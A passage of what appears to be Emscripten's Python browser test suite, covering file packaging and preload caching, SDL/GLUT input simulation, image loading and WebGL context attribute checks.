def test_output_file_escaping(self):
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.join(self.get_dir(), d)
ensure_dir(abs_d)
txt = 'file with ' + tricky_part + '.txt'
abs_txt = os.path.join(abs_d, txt)
open(abs_txt, 'w').write('load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
open(cpp, 'w').write(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("|load me right before|", buf);
REPORT_RESULT(result);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"')))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
self.run_process([FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file])
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.join(self.get_dir(), page_file)
self.compile_btest([cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-s', 'FORCE_FILESYSTEM'])
self.run_browser(page_file, '|load me right before|.', '/report_result?0')
def test_preload_caching(self):
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % 'somefile.txt')
create_test_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
# test caching of various sizes, including sizes higher than 128MB which is
# chrome's limit on IndexedDB item sizes, see
# https://cs.chromium.org/chromium/src/content/renderer/indexed_db/webidbdatabase_impl.cc?type=cs&q=%22The+serialized+value+is+too+large%22&sq=package:chromium&g=0&l=177
# https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/public/mojom/indexeddb/indexeddb.mojom.h?type=cs&sq=package:chromium&g=0&l=60
for extra_size in (0, 1 * 1024 * 1024, 100 * 1024 * 1024, 150 * 1024 * 1024):
if is_chrome() and extra_size >= 100 * 1024 * 1024:
continue
create_test_file('somefile.txt', '''load me right before running the code please''' + ('_' * extra_size))
print('size:', os.path.getsize('somefile.txt'))
self.compile_btest(['main.cpp', '--use-preload-cache', '--js-library', 'test.js', '--preload-file', 'somefile.txt', '-o', 'page.html', '-s', 'ALLOW_MEMORY_GROWTH'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_preload_caching_indexeddb_name(self):
create_test_file('somefile.txt', '''load me right before running the code please''')
def make_main(path):
print(path)
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % path)
create_test_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
self.run_process([FILE_PACKAGER, 'somefile.data', '--use-preload-cache', '--indexedDB-name=testdb', '--preload', 'somefile.txt', '--js-output=' + 'somefile.js'])
self.compile_btest(['main.cpp', '--js-library', 'test.js', '--pre-js', 'somefile.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_multifile(self):
# a few files inside a directory
ensure_dir(os.path.join('subdirr', 'moar'))
create_test_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
create_test_file(os.path.join('subdirr', 'moar', 'data2.txt'), '3.14159265358979')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT(result);
return 0;
}
''')
# by individual files
self.compile_btest(['main.cpp', '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html'])
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
os.remove('page.html')
# by directory, and remove files to make sure
self.compile_btest(['main.cpp', '--preload-file', 'subdirr', '-o', 'page.html'])
shutil.rmtree('subdirr')
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
def test_custom_file_package_url(self):
# a few files inside a directory
ensure_dir('subdirr')
ensure_dir('cdn')
create_test_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
# change the file package base dir to look in a "cdn". note that normally
# you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
REPORT_RESULT(result);
return 0;
}
''')
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html'])
shutil.move('test.data', os.path.join('cdn', 'test.data'))
self.run_browser('test.html', '', '/report_result?1')
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
create_test_file('data.txt', 'data')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed, because the required dependency file is missing.
REPORT_RESULT(0);
return 0;
}
''')
create_test_file('on_window_error_shell.html', r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}},
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>''')
def test():
# test: a missing file should run xhr.onload with a status other than 200, 304 or 206
setup("")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
shutil.move('test.data', 'missing.data')
self.run_browser('test.html', '', '/report_result?1')
# test unknown protocol should go through xhr.onerror
setup("unknown_protocol://")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for locateFile
# create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, '))
# test()
def test_dev_random(self):
self.btest(os.path.join('filesystem', 'dev_random.cpp'), expected='0')
def test_sdl_swsurface(self):
self.btest('sdl_swsurface.c', args=['-lSDL', '-lGL'], expected='1')
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
src = path_from_root('tests', 'sdl_image.c')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
src, '-o', 'page.html', '-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpeg')
src = path_from_root('tests', 'sdl_image.c')
self.compile_btest([
src, '-o', 'page.html', '-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True, manually_trigger_reftest=True)
def test_sdl_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp1.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp2.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp3.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp4.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_cleanup.c', expected='0', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-O0', '-s', 'SAFE_HEAP', '-lSDL', '-lGL'])
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-O2', '-s', 'SAFE_HEAP', '-lSDL', '-lGL'])
def post_manual_reftest(self, reference=None):
self.reftest(path_from_root('tests', self.reference if reference is None else reference))
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_test_file('test.html', html)
def test_sdl_canvas_proxy(self):
create_test_file('data.txt', 'datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
@requires_graphics_hardware
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-worker; emits 2 js files, client and worker
self.compile_btest([path_from_root('tests', 'hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'GL_TESTING', '-lGL', '-lglut'])
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/emscripten-core/emscripten/issues/4069.
create_test_file('flag_0.js', '''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for async_ in [
[],
['-DTEST_SLEEP', '-s', 'ASSERTIONS', '-s', 'SAFE_HEAP', '-s', 'ASYNCIFY']
]:
print(delay, defines, async_)
create_test_file('pre.js', '''
function keydown(c) {
%s
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
self.compile_btest([path_from_root('tests', 'sdl_key.c'), '-o', 'page.html'] + defines + async_ + ['--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main']''', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
create_test_file('pre.js', '''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_test_file('test.html', html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_canvas_focus(self):
self.btest('canvas_focus.c', '1')
def test_keydown_preventdefault_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keypress(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function sendKey(c) {
// Only send the keypress event if the prior keydown event
// was not default-prevented (dispatchEvent returned true).
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. The keypress should be sent, since the keydown for
// this key is not default-prevented.
sendKey(65);
// Send backspace. The keypress should not be sent, because the application
// prevents the default handling of the keydown event.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_test_file('test.html', html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-s', '''EXPORTED_FUNCTIONS=['_main']'''], manual_reference=True, post_build=post)
def test_sdl_text(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([path_from_root('tests', 'sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
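# pre.js exposes simulateMouseEvent(x, y, button), which dispatches
# mousedown/mouseup (button >= 0) or mousemove (button < 0) events at
# coordinates relative to the canvas position.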
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([path_from_root('tests', 'sdl_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
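# Same mouse simulation as above, but the events use absolute page coordinates
# and the canvas sits inside an absolutely-positioned container, so SDL must
# account for the canvas offsets (-DTEST_SDL_MOUSE_OFFSETS).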
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([path_from_root('tests', 'sdl_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify', '0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest('glut_touchevents.c', '1', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest('glut_wheelevents.c', '1', args=['-lglut'])
@requires_graphics_hardware
def test_glut_glutget_no_antialias(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_glut_glutget(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([path_from_root('tests', 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([path_from_root('tests', 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch a 'gamepadconnected' event (required for the glfw joystick path; the SDL test does not use it)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([path_from_root('tests', 'test_glfw_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-s', 'USE_GLFW=3'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_webgl_context_attributes(self):
# JavaScript library code that checks which context attributes the WebGL implementation supports
# (request the attribute, create a context, and check its value afterwards in the context attributes).
# The tests still succeed when an attribute is not supported by the implementation.
create_test_file('check_webgl_attributes_support.js', '''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
# Copy common code file to temporary directory
filepath = path_from_root('tests/test_webgl_context_attributes_common.c')
temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl2.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-s', 'USE_SDL=2', '-lGLEW'])
